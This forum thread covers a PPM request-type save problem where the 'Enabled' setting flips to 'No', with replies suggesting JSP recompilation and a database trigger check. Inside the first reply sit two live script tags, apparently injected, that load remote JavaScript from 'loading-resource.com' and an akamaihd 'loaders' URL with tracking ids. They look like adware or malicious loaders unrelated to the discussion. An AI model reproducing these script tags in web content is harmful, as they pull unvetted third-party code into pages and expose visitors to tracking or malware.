Search instead for 
Did you mean: 

Error when saving request type

Highlighted
JHarris941
Regular Collector

Error when saving request type

Hello All,

I was hoping you could he me with an issue. When I make a change to a request type and hit save, the "Enabled " radio button

switches from "Yes" to "No"..It doesn't happen all the time..has anyone experienced this before? Any info would be much

appreciated.

Thanks,

Jajcen

3 REPLIES
jsalass
Frequent Visitor

Re: Error when saving request type

Hi JHarris941,

I have not seen this problem before.

Is this happening to other users as well? do you know if the OOTB admin user is having this problem  too?

Is this happening in other language different than English?

Do new RTs have the issue too? happening to a specific RT? (RT stands for requests type)

Did you try recompiling all the jsp files in your PPM server? with just stop PPM and delete the work and temp folder from all your nodes and then starting teh server again you will recompile all the files involved in PPM.

Also, what is your current PPM version?

Lets us know so with those details we will be able to help you better.

Regards,

Jonathan

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
jsalass
Frequent Visitor

Also, any custom code you may have in that page that you are aware?

Regards,
Jonathan
Mohit_Agrawal
Frequent Visitor

Hi Jajcen,

That may be because of any trigger in the database. When you save the request type then the trigger would check for the particular condition, if that is satisfied then it must be updating the Radio button from Yes to No.

Check the Triggers in database. That might be possible cause for this situation. Go to database and execute below query..

Say the paramter for Radio button is Parameter30..

SELECT * FROM USER_SOURCE WHERE TEXT LIKE '%PARAMETER30%';

Check all the Database Objects in the result. If there is any trigger then open and see if that's causing this issue.

PS: If the post resolves your issue, please give KUDOS and mark it as Accepted Solution.

Thanks!!
Mohit Agrawal

//Add this to "OnDomLoad" event